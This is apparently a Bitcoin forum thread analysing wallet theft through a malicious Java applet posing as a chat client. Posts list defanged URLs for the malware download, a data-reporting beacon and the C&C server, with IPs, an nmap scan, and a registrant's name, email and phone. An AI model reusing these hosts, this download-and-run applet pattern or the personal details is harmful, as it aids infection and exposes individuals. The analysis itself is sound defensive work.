deleted

[vipes2010]

deleted

[wumpus]

There are multiple possibilities:

- Weak passphrase

- He still had an unencrypted copy of the wallet around on his system

- An unencrypted copy of the wallet was still somewhere in the unallocated/deleted part of the file system (if the exploit scans the raw disk)

- He did type the wallet passphrase (and it got keylogged) but forgot about it

I'm sure that all problems with unencrypted keys staying behind in the wallet.dat are solved in 0.8.0 (in 0.6.0 already). When you encrypt, or upgrade from an older insecure version (versions 0.4.0 and 0.5.0rc), the wallet is re-written without any unencrypted keys remaining behind in the slack space of the database. Also, all keys that were in the wallet before encryption are marked so they will not be used anymore.

If you're really paranoid about "unencrypted keys staying behind in unallocated space in the file system", an additional security mechanism is to send all your coins to a receiving address that is generated after the wallet is encrypted.

[Nicolai]

The webpage with the exploit: hXXp://coinchat.freetzi.com/blank.html

Code:

<applet name='Coin Chat Client' width='900' height='450' code='wFidEABfB.class' archive='wFidEABfB.jar'></applet>

The .jar contains:

The malware: hXXp://fuskbugg.se/dl/f1adsy/smss2.exe (virustotal)
(I have sent the file to a lot of A/V vendors, so hopefully the detection rate will soon be better)

And badly obfuscated "logger":

hXXp://galaxyjdb.com/insert.php?&o= OS.name &u=thewinner1234&ip= IP &e= paramString

(could be some kind of pay-by-install ?)
paramString can be "Noa", "Noc", "Yes", "Nod"

(also "http" has been changed to "hXXp", just in case. NEVER click ANY of these links, unless you know what you're doing).

EDIT1:
The malware C&C server = service2012.no-ip.biz = 63.141.253.124 (port 91)

coinchat.freetzi.com = 69.162.82.249
fuskbugg.se = 88.80.2.12
galaxyjdb.com = 109.163.233.106

galaxyjdb.com is owned by:

Code:

Quick Ware
   Alex B (sblfc1234@gmail.com)
   +44.7543642587
   Fax: +1.5555555555
   8 does it matter road
   Liverpool, merseyside l17 7ja
   GB

EDIT2:
The .jar exploit contain:

Code:

k{ol~puuly89:
Coded By Orpheu
The Responsibility in the use of this is on the user not the coder

(Orpheu's skype = izroda6)

And the C&C server is most likely made using this tutorial: http://www.hackforums.net/showthread.php?tid=145184

[Mike Hearn]

As far as I could tell it's not an exploit - I didn't see any obviously tricky code. It just looks like a regular applet that downloads and runs an EXE file to me. The EXE itself claims to be a compiled AutoIt script so, again, I am skeptical it's very sophisticated. The guy in question said he was using Chrome but it looked like a chat app so he gave it full permissions.

[interfect]

Holy Nmap Batman!

Code:

$ nmap 63.141.253.124

Starting Nmap 6.00 ( http://nmap.org ) at 2013-04-19 17:58 PDT
Nmap scan report for 63.141.253.124
Host is up (0.11s latency).
Not shown: 973 closed ports
PORT      STATE    SERVICE
22/tcp    open     ssh
25/tcp    filtered smtp
80/tcp    open     http
135/tcp   filtered msrpc
139/tcp   filtered netbios-ssn
211/tcp   filtered 914c-g
445/tcp   filtered microsoft-ds
500/tcp   filtered isakmp
513/tcp   filtered login
666/tcp   filtered doom
1100/tcp  filtered mctp
1999/tcp  filtered tcp-id-port
2000/tcp  filtered cisco-sccp
2030/tcp  filtered device2
3006/tcp  filtered deslogind
3306/tcp  open     mysql
3814/tcp  filtered neto-dcs
5000/tcp  filtered upnp
6001/tcp  filtered X11:1
7938/tcp  filtered lgtomapper
8800/tcp  filtered sunwebadmin
8888/tcp  filtered sun-answerbook
9002/tcp  filtered dynamid
9290/tcp  filtered unknown
10215/tcp filtered unknown
40911/tcp filtered unknown
60020/tcp filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 18.23 seconds

[Nicolai]

Mike Hearn: You are right, it does not exploit any flaws in Java (just ask permission, download'n'run the malware).

[K1773R]

As far as I could tell it's not an exploit - I didn't see any obviously tricky code. It just looks like a regular applet that downloads and runs an EXE file to me. The EXE itself claims to be a compiled AutoIt script so, again, I am skeptical it's very sophisticated. The guy in question said he was using Chrome but it looked like a chat app so he gave it full permissions.

if someone provides the autoit binary, i decompile it

[K1773R]

unfortunately the code has been obfuscated, but you can still find out what it does it just takes more time to understand it
if someone is interested in it, send me a message and il send it to you (without the binary of course!). i dont want to host this code since its malware!